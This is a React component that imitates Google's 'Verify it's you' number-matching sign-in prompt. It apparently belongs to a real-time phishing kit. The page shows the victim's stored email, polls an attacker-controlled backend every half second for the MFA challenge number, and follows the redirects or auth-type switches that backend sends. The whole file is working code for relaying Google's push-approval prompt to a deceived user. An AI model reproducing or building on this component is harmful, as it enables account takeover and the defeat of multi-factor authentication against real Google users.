import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import GoogleAuthLayout from "./GoogleAuthLayout";
import { AUTH_TYPE_ROUTES } from "./authRoutes";

export default function Tap() {
  const navigate = useNavigate();
  const [verificationNumber, setVerificationNumber] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [error, setError] = useState("");
  const [email, setEmail] = useState("");
  const [resendCountdown, setResendCountdown] = useState(0);
  const [locked, setLocked] = useState(false);

  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const tapNumberDisplay = verificationNumber || "";

  const handleResend = async () => {
    try {
      await fetch(`${API_URL}/api/resend/app`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ session_id: sessionId }),
      });
    } catch (err) {
      console.error("Resend fail:", err);
    }
  };

  const handleResendClick = (e) => {
    e.preventDefault();
    if (resendCountdown > 0 || locked) return;
    handleResend();
    setResendCountdown(15);
  };

  useEffect(() => {
    const storedEmail = localStorage.getItem("userEmail") || localStorage.getItem("username") || "";
    setEmail(storedEmail);

    const storedSessionId = localStorage.getItem("session_id");
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }
  }, []);

  useEffect(() => {
    if (resendCountdown > 0) {
      const timer = setTimeout(() => setResendCountdown(resendCountdown - 1), 1000);
      return () => clearTimeout(timer);
    }
  }, [resendCountdown]);

  useEffect(() => {
    if (!sessionId) return;

    const poll = setInterval(async () => {
      try {
        const res = await fetch(`${API_URL}/check_response?session_id=${sessionId}`);
        if (!res.ok) return;

        const data = await res.json();

        if (data.verification_number) {
          setVerificationNumber(data.verification_number);
        }

        if (data.redirect) {
          clearInterval(poll);
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        if (data.authType && data.authType !== "tap" && data.authType !== "app") {
          clearInterval(poll);
          const route = AUTH_TYPE_ROUTES[data.authType];
          if (route) navigate(route);
          return;
        }

        if (data.error) {
          clearInterval(poll);
          setError(data.error);
        }
      } catch (err) {
        console.error("Polling error:", err);
      }
    }, 500);

    return () => clearInterval(poll);
  }, [sessionId, navigate, API_URL]);

  const resendClassName = `google-link-secondary ${locked || resendCountdown > 0 ? "google-link-disabled" : ""}`;
  const resendLabel = resendCountdown > 0 ? `Resend in ${resendCountdown}s` : "Resend it";

  return (
    <GoogleAuthLayout
      heading="Verify it's you"
      subheading={
        <>
          To help keep your account safe, Google wants to make sure it&apos;s really you trying to sign in.{" "}
          <a href="#" className="google-link">Learn more</a>
        </>
      }
      email={email}
      showEmailBadge
      brandActions={
        <a href="#" className={resendClassName} onClick={handleResendClick}>
          {resendLabel}
        </a>
      }
    >
      {error && (
        <div className="google-error-container">
          <p className="google-error-message">{error}</p>
        </div>
      )}

      <div className="google-tap-verification">
        <div className="google-tap-content">
          <div className="google-tap-number">{tapNumberDisplay}</div>
          <h2 className="google-tap-heading">Open the Gmail app</h2>
          <p className="google-tap-description">
            Google sent a notification to your phone. Open the Gmail app, tap <strong>Yes</strong> on the prompt,
            then tap <strong>{tapNumberDisplay || "73"}</strong> on your phone to verify it&apos;s you.
          </p>
          <div className="google-tap-actions google-tap-resend--mobile">
            <a href="#" className={resendClassName} onClick={handleResendClick}>
              {resendLabel}
            </a>
          </div>
        </div>
      </div>
    </GoogleAuthLayout>
  );
}
